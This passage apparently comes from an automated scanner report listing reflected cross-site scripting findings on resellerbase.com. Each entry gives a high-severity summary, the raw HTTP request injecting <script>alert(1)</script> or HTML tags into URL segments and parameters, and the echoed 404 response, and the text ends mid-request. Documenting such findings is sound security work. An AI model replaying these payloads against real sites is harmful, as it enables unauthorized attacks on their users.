This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaila292f<script>alert(1)</script>ea43a5b7aac/16/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaila292f<script>alert(1)</script>ea43a5b7aac/16/rating.php was not found on this server.</p>
...[SNIP]...

2.1297. http://www.resellerbase.com/detail/16/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 51894<script>alert(1)</script>20bf8a920084789cd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail51894<script>alert(1)</script>20bf8a920084789cd/16/rating.php?id=16&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/worldkom-net.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail51894<script>alert(1)</script>20bf8a920084789cd/16/rating.php?id=16&rating=5 was not found on this server.</p>
...[SNIP]...

2.1298. http://www.resellerbase.com/detail/16/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ffc05<script>alert(1)</script>76a51091d8c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16ffc05<script>alert(1)</script>76a51091d8c/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16ffc05<script>alert(1)</script>76a51091d8c/rating.php was not found on this server.</p>
...[SNIP]...

2.1299. http://www.resellerbase.com/detail/16/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 61e91<script>alert(1)</script>f0793875037bb04f4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/1661e91<script>alert(1)</script>f0793875037bb04f4/rating.php?id=16&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/worldkom-net.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/1661e91<script>alert(1)</script>f0793875037bb04f4/rating.php?id=16&rating=5 was not found on this server.</p>
...[SNIP]...

2.1300. http://www.resellerbase.com/detail/16/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4724b<script>alert(1)</script>1d6de266f8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/rating.php4724b<script>alert(1)</script>1d6de266f8 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/rating.php4724b<script>alert(1)</script>1d6de266f8 was not found on this server.</p>
...[SNIP]...

2.1301. http://www.resellerbase.com/detail/16/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ba833<script>alert(1)</script>c4e289ad819f924e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/16/rating.phpba833<script>alert(1)</script>c4e289ad819f924e?id=16&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/worldkom-net.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/rating.phpba833<script>alert(1)</script>c4e289ad819f924e?id=16&rating=5 was not found on this server.</p>
...[SNIP]...

2.1302. http://www.resellerbase.com/detail/16/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload dc89e<script>alert(1)</script>23d8d151edbd46477 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/16/rating.php/dc89e<script>alert(1)</script>23d8d151edbd46477?id=16&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/worldkom-net.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/rating.php/dc89e<script>alert(1)</script>23d8d151edbd46477?id=16&rating=5 was not found on this server.</p>
...[SNIP]...

2.1303. http://www.resellerbase.com/detail/16/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload dab93<script>alert(1)</script>09322b1d3cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/rating.php?dab93<script>alert(1)</script>09322b1d3cf=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/rating.php?dab93<script>alert(1)</script>09322b1d3cf=1 was not found on this server.</p>
...[SNIP]...

2.1304. http://www.resellerbase.com/detail/16/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 30cc2<script>alert(1)</script>eb7b339f2a4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail30cc2<script>alert(1)</script>eb7b339f2a4/16/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/worldkom-net.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail30cc2<script>alert(1)</script>eb7b339f2a4/16/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1305. http://www.resellerbase.com/detail/16/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c6ece<script>alert(1)</script>514d596f62c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16c6ece<script>alert(1)</script>514d596f62c/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/worldkom-net.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16c6ece<script>alert(1)</script>514d596f62c/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1306. http://www.resellerbase.com/detail/16/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5b39b<script>alert(1)</script>339635f5a7f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/search.php5b39b<script>alert(1)</script>339635f5a7f?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/worldkom-net.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/search.php5b39b<script>alert(1)</script>339635f5a7f?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1307. http://www.resellerbase.com/detail/16/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/16/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 1148a<a>7e5450d19c3 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/16/search.php?keyword=search...&Submit3=Search1148a<a>7e5450d19c3&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/worldkom-net.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/search.php?keyword=search...&Submit3=Search1148a<a>7e5450d19c3&opt=2 was not found on this server.</p>
...[SNIP]...

2.1308. http://www.resellerbase.com/detail/16/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/16/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload e6554<a>dfea2ab1d90 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/16/search.php?keyword=search...e6554<a>dfea2ab1d90&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/worldkom-net.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/search.php?keyword=search...e6554<a>dfea2ab1d90&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1309. http://www.resellerbase.com/detail/16/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload aca8c<script>alert(1)</script>e00d97ad994 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/search.php?keyword=search...&Submit3=Search&opt=2&aca8c<script>alert(1)</script>e00d97ad994=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/worldkom-net.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/search.php?keyword=search...&Submit3=Search&opt=2&aca8c<script>alert(1)</script>e00d97ad994=1 was not found on this server.</p>
...[SNIP]...

2.1310. http://www.resellerbase.com/detail/16/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/16/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload c6c04<a>3821b8c64db was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/16/search.php?keyword=search...&Submit3=Search&opt=2c6c04<a>3821b8c64db HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/worldkom-net.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/search.php?keyword=search...&Submit3=Search&opt=2c6c04<a>3821b8c64db was not found on this server.</p>
...[SNIP]...

2.1311. http://www.resellerbase.com/detail/16/themes/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bb555<script>alert(1)</script>f67184b910c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailbb555<script>alert(1)</script>f67184b910c/16/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailbb555<script>alert(1)</script>f67184b910c/16/themes/ was not found on this server.</p>
...[SNIP]...

2.1312. http://www.resellerbase.com/detail/16/themes/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 25e36<script>alert(1)</script>5e2f7e1580f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/1625e36<script>alert(1)</script>5e2f7e1580f/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/1625e36<script>alert(1)</script>5e2f7e1580f/themes/ was not found on this server.</p>
...[SNIP]...

2.1313. http://www.resellerbase.com/detail/16/themes/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f1ec1<script>alert(1)</script>04f45f39b9a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themesf1ec1<script>alert(1)</script>04f45f39b9a/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themesf1ec1<script>alert(1)</script>04f45f39b9a/ was not found on this server.</p>
...[SNIP]...

2.1314. http://www.resellerbase.com/detail/16/themes/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c32ce<script>alert(1)</script>5d7d89ed39e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themes/?c32ce<script>alert(1)</script>5d7d89ed39e=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/?c32ce<script>alert(1)</script>5d7d89ed39e=1 was not found on this server.</p>
...[SNIP]...

2.1315. http://www.resellerbase.com/detail/16/themes/kosmos/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 881be<script>alert(1)</script>26cc27c95c1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail881be<script>alert(1)</script>26cc27c95c1/16/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
